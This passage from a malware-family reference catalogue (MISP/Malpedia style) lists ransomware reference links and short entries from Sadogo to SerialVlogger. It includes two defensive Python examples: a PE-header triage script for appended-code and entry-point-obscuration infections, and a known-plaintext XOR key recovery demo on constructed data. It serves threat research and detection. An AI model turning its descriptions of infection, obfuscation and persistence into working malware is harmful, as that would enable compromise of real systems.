https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf

https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more

https://thedfirreport.com/2021/01/31/bazar-no-ryuk/

https://www.bleepingcomputer.com/news/security/steelcase-furniture-giant-hit-by-ryuk-ransomware-attack/

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf

https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html

https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://blog.reversinglabs.com/blog/hunting-for-ransomware

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/

https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon

https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/

https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://www.youtube.com/watch?v=HwfRxjV2wok

https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/

https://www.zdnet.com/article/dod-contractor-suffers-ransomware-infection/

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html

https://thedfirreport.com/2020/10/08/ryuks-return/

https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion

https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets

https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022

https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf

https://www.scythe.io/library/threatthursday-ryuk

https://www.secureworks.com/research/threat-profiles/gold-ulrick

https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/

https://www.bleepingcomputer.com/news/security/new-ryuk-info-stealer-targets-government-and-military-secrets/

https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/

https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html

https://www.splunk.com/en_us/blog/security/ryuk-and-splunk-detections.html

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://community.riskiq.com/article/0bcefe76

https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/

https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2

https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/

https://ia.acs.org.au/article/2019/hospital-cyberattack-could-have-been-avoided.html

https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox

https://sites.temple.edu/care/ci-rw-attacks/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://twitter.com/ffforward/status/1324281530026524672

https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware

https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/

https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf

https://thehackernews.com/2022/05/malware-analysis-trickbot.html

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://threatconnect.com/blog/threatconnect-research-roundup-ryuk-and-domains-spoofing-eset-and-microsoft/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html

https://research.nccgroup.com/2021/03/04/deception-engineering-exploring-the-use-of-windows-service-canaries-against-ransomware/

Sadogo

Ransomware.

The tag is: misp-galaxy:malpedia="Sadogo"

Sadogo is also known as:

Table 4498. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sadogo

https://id-ransomware.blogspot.com/2020/04/sadogo-ransomware.html

Saefko

The tag is: misp-galaxy:malpedia="Saefko"

Saefko is also known as:

Table 4499. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.saefko

https://www.zscaler.com/blogs/research/saefko-new-multi-layered-rat

Sagerunex

According to Symantec, Sagerunex is a fairly resilient backdoor that implements multiple forms of communication with its command-and-control (C&C) server. Its logs are encrypted with AES-256-CBC; the key is derived from a hardcoded key by 8192 rounds of SHA-256. It supports multiple methods of communicating over HTTP and is proxy-aware.

The tag is: misp-galaxy:malpedia="Sagerunex"

Sagerunex is also known as:

Table 4501. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sagerunex

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments-cert-authority

SaiGon

FireEye reports SaiGon as a variant of ISFB v3 (the versions documented are tagged 3.50.132) that acts more as a generic backdoor than as a tool focused on enabling banking fraud.

The tag is: misp-galaxy:malpedia="SaiGon"

SaiGon is also known as:

Table 4503. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.saigon

https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html

https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/

Sality

F-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware.

Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.

Infection: Sality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (host) file, a technique known as appending. The viral code that Sality inserts is polymorphic, complex code intended to make analysis more difficult.

Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. This technique means that the virus inserts a command somewhere in the middle of an infected file’s code, so that when the system is reading the file to execute it and comes to the command, it forces the system to 'jump' to the malware’s code and execute that instead. This technique was used to make discovery and disinfection of the malicious code harder.

Payload: Once installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions depend on the variant, but generally Sality viruses attempt to terminate processes, particularly those belonging to security programs. The virus may also open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.
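The two infection styles described above leave different traces in the PE headers: an appending infector usually parks its body at the end of the last section and redirects AddressOfEntryPoint into it, while an EPO infector leaves the entry point alone and plants a jump inside the original code. The following is an added example, not F-Secure’s or Malpedia’s code: a standard-library-only triage script that parses the PE section table and reports the indicators a practitioner would check for each style. The three images it inspects are minimal constructed stubs, not real Sality samples, and the byte-level 0xE9 scan is a heuristic that needs tuning (or a real disassembler) on production binaries.

```python
import struct

# Layout constants from the Microsoft PE/COFF specification.
E_LFANEW_OFFSET = 0x3C
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe(pe: bytes):
    """Return (AddressOfEntryPoint, section list) for a PE32/PE32+ file held in memory."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", pe, E_LFANEW_OFFSET)[0]
    if pe[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = pe_off + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    sections, off = [], opt + opt_size
    for _ in range(num_sections):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, off)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vaddr": vaddr,
                         "vsize": vsize, "rawsize": rawsize, "rawptr": rawptr,
                         "chars": chars, "raw": pe[rawptr:rawptr + rawsize]})
        off += 40
    return entry_rva, sections


def section_of(sections, rva):
    for s in sections:
        if s["vaddr"] <= rva < s["vaddr"] + max(s["vsize"], s["rawsize"]):
            return s
    return None


def infection_indicators(pe: bytes):
    """Heuristics for appended-code and EPO infections; returns a list of human-readable findings."""
    entry_rva, sections = parse_pe(pe)
    last, findings = sections[-1], []
    ep_sec = section_of(sections, entry_rva)
    if ep_sec is None:
        findings.append("entry point outside every section")
    elif ep_sec is last and len(sections) > 1:
        # Classic appender: body glued onto the last section, AddressOfEntryPoint redirected into it.
        findings.append(f"entry point in last section {ep_sec['name']!r}")
    for s in sections:
        if s["chars"] & IMAGE_SCN_MEM_WRITE and s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"section {s['name']!r} is writable and executable")
    end_of_sections = max(s["rawptr"] + s["rawsize"] for s in sections)
    if len(pe) > end_of_sections:
        findings.append(f"{len(pe) - end_of_sections} bytes of overlay after the last section")
    # EPO: entry point untouched, but a jmp rel32 (0xE9) inside the entry section diverts into the
    # last section. Restricting targets to the last section removes most chance 0xE9 matches.
    if ep_sec is not None and ep_sec is not last:
        raw = ep_sec["raw"]
        for i in range(len(raw) - 4):
            if raw[i] != 0xE9:
                continue
            rel = struct.unpack_from("<i", raw, i + 1)[0]
            target = (ep_sec["vaddr"] + i + 5 + rel) & 0xFFFFFFFF
            if section_of(sections, target) is last:
                findings.append(f"jmp at {ep_sec['name']}+{i:#x} targets {target:#x} in last section {last['name']!r}")
    return findings


def build_pe(sections, entry_rva, overlay=b""):
    """Assemble a minimal, non-runnable PE32 stub for exercising the heuristics (constructed test data)."""
    n = len(sections)
    hdr_size = (0x40 + 4 + 20 + 224 + 40 * n + 0x1FF) & ~0x1FF
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, E_LFANEW_OFFSET, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 224, 0x0102)   # i386, SizeOfOptionalHeader=224
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)          # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)     # AddressOfEntryPoint
    table, body, rawptr = bytearray(), bytearray(), hdr_size
    for name, vaddr, data, chars in sections:
        rawsize = (len(data) + 0x1FF) & ~0x1FF
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(data), vaddr, rawsize, rawptr, 0, 0, 0, 0, chars)
        body += data.ljust(rawsize, b"\0")
        rawptr += rawsize
    image = (dos + b"PE\0\0" + coff + opt + table).ljust(hdr_size, b"\0")
    return bytes(image + body + overlay)


TEXT_FLAGS = 0x60000020   # IMAGE_SCN_CNT_CODE | MEM_EXECUTE | MEM_READ
DATA_FLAGS = 0xC0000040   # IMAGE_SCN_CNT_INITIALIZED_DATA | MEM_READ | MEM_WRITE
RWX_FLAGS = 0xE0000040    # the data section after an infector marks it executable

CLEAN_CODE = b"\x55\x89\xe5\x31\xc0\x5d\xc3"   # push ebp; mov ebp,esp; xor eax,eax; pop ebp; ret
# Constructed stand-in for an appended virus body at .data+0x10 (RVA 0x2010): pushad/pushfd, filler,
# popfd/popad, then jmp back to the host's original entry point at RVA 0x1000.
VIRUS_BODY = b"\x60\x9c" + b"\x90" * 6 + b"\x9d\x61" + b"\xe9" + struct.pack("<i", 0x1000 - (0x2010 + 10 + 5))
INFECTED_DATA = b"hello\0".ljust(0x10, b"\0") + VIRUS_BODY

CLEAN = build_pe([(".text", 0x1000, CLEAN_CODE, TEXT_FLAGS), (".data", 0x2000, b"hello\0", DATA_FLAGS)], 0x1000)
# Appending infection: entry point moved into the (now RWX) last section, plus an overlay of junk.
APPENDED = build_pe([(".text", 0x1000, CLEAN_CODE, TEXT_FLAGS), (".data", 0x2000, INFECTED_DATA, RWX_FLAGS)],
                    0x2010, overlay=b"\xAA" * 64)
# EPO infection: entry point still 0x1000 in .text, but the instruction at .text+3 became jmp 0x2010.
EPO_CODE = b"\x55\x89\xe5" + b"\xe9" + struct.pack("<i", 0x2010 - (0x1000 + 3 + 5)) + b"\x5d\xc3"
EPO = build_pe([(".text", 0x1000, EPO_CODE, TEXT_FLAGS), (".data", 0x2000, INFECTED_DATA, RWX_FLAGS)], 0x1000)

if __name__ == "__main__":
    for label, image in (("clean", CLEAN), ("appended", APPENDED), ("epo", EPO)):
        print(label, infection_indicators(image) or ["no indicators"])
```

Note what the EPO case teaches: the entry-point checks that catch the appending variant return nothing for it, which is exactly why the technique was adopted; only looking at the code flow (here a crude jmp scan, in practice a disassembler or emulator) reveals the diversion.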

The tag is: misp-galaxy:malpedia="Sality"

Sality is also known as:

Table 4508. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sality

https://unit42.paloaltonetworks.com/c2-traffic/

https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf

https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://gist.githubusercontent.com/quangnh89/41deada8a936a1877a6c6c757ce73800/raw/41f27388a11a606e1d6a7596dcb6469578e79321/sality_extractor.py

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://www.dragos.com/blog/the-trojan-horse-malware-password-cracking-ecosystem-targeting-industrial-operators/

https://www.mandiant.com/resources/pe-file-infecting-malware-ot

SamoRAT

According to PCrisk, SamoRAT is a Remote Access Trojan (RAT), a type of malware that allows the cyber criminals responsible to monitor and control the infected computer. In most cases, RATs are used to steal sensitive information and/or install other malware onto the infected computer.

The tag is: misp-galaxy:malpedia="SamoRAT"

SamoRAT is also known as:

Table 4509. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.samo_rat

https://business.xunison.com/analysis-of-samorat/

SamSam

According to PCrisk, SamSam is high-risk ransomware designed to infect unpatched servers and encrypt files stored on computers networked to the infected server.

The tag is: misp-galaxy:malpedia="SamSam"

SamSam is also known as:

  • Samas

Table 4510. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam

https://nakedsecurity.sophos.com/2018/08/02/how-to-defend-yourself-against-samsam-ransomware/

https://therecord.media/iranian-hackers-behind-cox-media-group-ransomware-attack/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/

https://www.justice.gov/opa/press-release/file/1114746/download

https://www.secureworks.com/blog/ransomware-deployed-by-adversary

https://news.sophos.com/en-us/2018/11/29/how-a-samsam-like-attack-happens-and-what-you-can-do-about-it/

https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx

https://news.sophos.com/en-us/2018/07/31/sophoslabs-releases-samsam-ransomware-report/

https://nakedsecurity.sophos.com/2018/07/31/samsam-the-almost-6-million-ransomware/

https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

http://blog.talosintel.com/2016/03/samsam-ransomware.html

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html

https://www.secureworks.com/research/samsam-ransomware-campaigns

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/

https://www.secureworks.com/research/threat-profiles/gold-lowell

https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf

https://sites.temple.edu/care/ci-rw-attacks/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://news.sophos.com/en-us/2018/07/31/samsam-guide-to-coverage/

https://www.secureworks.com/blog/samsam-converting-opportunity-into-profit

https://www.secureworks.com/blog/samas-ransomware

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/

SapphireMiner

The tag is: misp-galaxy:malpedia="SapphireMiner"

SapphireMiner is also known as:

Table 4512. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sapphire_miner

https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html

SapphireStealer

The tag is: misp-galaxy:malpedia="SapphireStealer"

SapphireStealer is also known as:

Table 4513. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sapphire_stealer

https://github.com/0day2/SapphireStealer/

Satacom

The tag is: misp-galaxy:malpedia="Satacom"

Satacom is also known as:

  • LegionLoader

Table 4517. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.satacom

https://securelist.com/satacom-delivers-cryptocurrency-stealing-browser-extension/109807/

Satana

According to Bitdefender, Satana is an aggressive ransomware for Windows that encrypts the computer’s master boot record (MBR) and prevents it from starting.

The tag is: misp-galaxy:malpedia="Satana"

Satana is also known as:

Table 4519. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.satana

https://blog.reversinglabs.com/blog/retread-ransomware

https://www.cylance.com/threat-spotlight-satan-raas

Scarabey

Ransomware with a ransom note in Russian; encrypted files receive the extension .scarab.

The tag is: misp-galaxy:malpedia="Scarabey"

Scarabey is also known as:

  • MVP

  • Scarab

  • Scarab-Russian

Table 4523. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.scarabey

https://id-ransomware.blogspot.com/2017/12/scarabey-ransomware.html

ScareCrow

Based on the leaked Conti source code.

The tag is: misp-galaxy:malpedia="ScareCrow"

ScareCrow is also known as:

Table 4525. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.scarecrow

https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-vohuk-scarecrow-and-aerst-variants

Schneiken

Schneiken is a VBS 'double-dropper': it carries two RATs (Dunihi and Ratty) embedded in its code. The entire code is Base64-encoded.

The tag is: misp-galaxy:malpedia="Schneiken"

Schneiken is also known as:

Table 4526. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken

https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb

https://github.com/vithakur/schneiken

Scout

A downloader that uses Windows messages to control its execution flow.

The tag is: misp-galaxy:malpedia="Scout"

Scout is also known as:

Table 4529. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.scout

https://asec.ahnlab.com/en/57685/

ScreenCap

SentinelOne describes this malware as capable of screen capture and keylogging. It is used by a threat cluster they named WIP19, targeting telecommunications and IT service providers in the Middle East and Asia.

The tag is: misp-galaxy:malpedia="ScreenCap"

ScreenCap is also known as:

Table 4531. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.screencap

https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/

ScreenLocker

The tag is: misp-galaxy:malpedia="ScreenLocker"

ScreenLocker is also known as:

Table 4532. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.screenlocker

https://twitter.com/struppigel/status/791535679905927168

SDBbot

The tag is: misp-galaxy:malpedia="SDBbot"

SDBbot is also known as:

Table 4534. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sdbbot

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/

https://www.secureworks.com/research/threat-profiles/gold-tahoe

https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader

https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104

https://github.com/Tera0017/SDBbot-Unpacker

https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

https://vblocalhost.com/uploads/VB2020-Jung.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://www.cyber.gov.au/acsc/view-all-content/alerts/sdbbot-targeting-health-sector

https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824

https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.96_ENG.pdf

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://intel471.com/blog/a-brief-history-of-ta505

Seduploader

A simple tool that downloads a next-stage tool and establishes persistence for it. It collects system information and metadata, probably so that the server side can tell sandbox environments apart from real targets. It uses search-engine domains such as Google to check for Internet connectivity. Strings are obfuscated with XOR using a 16-byte key.
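When a sample protects its strings with XOR under a short fixed key, as described above, the key is usually recoverable from a known plaintext without stepping through the decoding routine. The following is an added example, not code from ESET, Malpedia or the sample itself: it assumes the scheme is a plain repeating 16-byte key (the exact Seduploader routine is not given on the page), slides a crib across an obfuscated blob, keeps only alignments where the crib agrees with itself across key wrap-arounds and where everything the partial key decodes still looks like string-table content, and prints what each crib reveals. The blob, key and strings are constructed for the demonstration; the file path in particular is invented.

```python
KEY_LEN = 16
# What decoded string-table bytes are allowed to look like: printable ASCII, NUL separators, whitespace.
PLAUSIBLE = set(range(0x20, 0x7F)) | {0x00, 0x09, 0x0A, 0x0D}


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_partial(blob: bytes, key: list):
    """Decode with a partial key (None = unknown slot); positions whose slot is unknown come back as None."""
    return [None if key[i % len(key)] is None else b ^ key[i % len(key)] for i, b in enumerate(blob)]


def candidate_keys(blob: bytes, crib: bytes, key_len: int = KEY_LEN):
    """Slide a known plaintext over the blob and return (offset, partial_key) pairs that survive two
    checks: the crib must agree with itself wherever it wraps around the key, and everything the
    partial key decodes elsewhere in the blob must still look like string-table content."""
    results = []
    for off in range(len(blob) - len(crib) + 1):
        key = [None] * key_len
        consistent = True
        for j, c in enumerate(crib):
            slot = (off + j) % key_len
            k = blob[off + j] ^ c
            if key[slot] is None:
                key[slot] = k
            elif key[slot] != k:          # same key slot, different value: wrong alignment
                consistent = False
                break
        if not consistent:
            continue
        decoded = decode_partial(blob, key)
        if all(b in PLAUSIBLE for b in decoded if b is not None):
            results.append((off, key))
    return results


def render(decoded) -> str:
    """'?' for positions the partial key cannot decode, '|' for NUL separators."""
    return "".join("?" if b is None else "|" if b == 0 else chr(b) for b in decoded)


# Constructed sample: a NUL-separated string table of the kind a loader keeps (connectivity-check URL,
# Run-key persistence path, payload path), XORed with a 16-byte key. The key and the .dll path are invented.
KEY = bytes.fromhex("5a3c9e17f04b28d6a1c37e92bd45608f")
STRINGS = [b"http://www.google.com/",
           b"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
           b"%APPDATA%\\stage2.dll"]
PLAINTEXT = b"\0".join(STRINGS) + b"\0"
BLOB = xor_with_key(PLAINTEXT, KEY)
RUN_KEY_CRIB = b"Software\\Microsoft\\Windows\\CurrentVersion\\Run"

if __name__ == "__main__":
    for crib in (b"http://", RUN_KEY_CRIB):
        for off, key in candidate_keys(BLOB, crib):
            known = sum(k is not None for k in key)
            print(f"crib {crib[:10]!r} fits at {off:#x}; {known}/{KEY_LEN} key bytes recovered")
            print("   ", render(decode_partial(BLOB, key)))
```

A 7-byte crib such as "http://" only pins 7 of the 16 key slots, so the partial decode shows every 16-byte period with the same gaps; a crib longer than the key (the Run path here) wraps around and both completes the key and over-determines the alignment, which is why a single long, sample-typical string is usually enough.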

The tag is: misp-galaxy:malpedia="Seduploader"

Seduploader is also known as:

  • GAMEFISH

  • carberplike

  • downrage

  • jhuhugit

  • jkeyskw

Table 4540. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader

https://blog.yoroi.company/research/apt28-and-upcoming-elections-possible-interference-signals-part-ii/

https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf

http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html

https://www.emanueledelucia.net/apt28-sofacy-seduploader-under-the-christmas-tree/

https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/

https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/

https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government

https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

https://blog.xpnsec.com/apt28-hospitality-malware-part-2/

http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/

http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/

https://securelist.com/a-slice-of-2017-sofacy-activity/83930/

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html

https://www.secureworks.com/research/threat-profiles/iron-twilight

https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf

https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed

seinup

The tag is: misp-galaxy:malpedia="seinup"

seinup is also known as:

Table 4541. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.seinup

https://www.fireeye.com/blog/threat-research/2013/06/trojan-apt-seinup-hitting-asean.html

SepSys

Ransomware.

The tag is: misp-galaxy:malpedia="SepSys"

SepSys is also known as:

  • Silvertor Ransomware

Table 4545. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sepsys

https://id-ransomware.blogspot.com/2020/02/sepsys-ransomware.html

SerialVlogger

This malware is protected using VMProtect and related to the loading of KEYPLUG.

The tag is: misp-galaxy:malpedia="SerialVlogger"

SerialVlogger is also known as:

Table 4547. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.serialvlogger

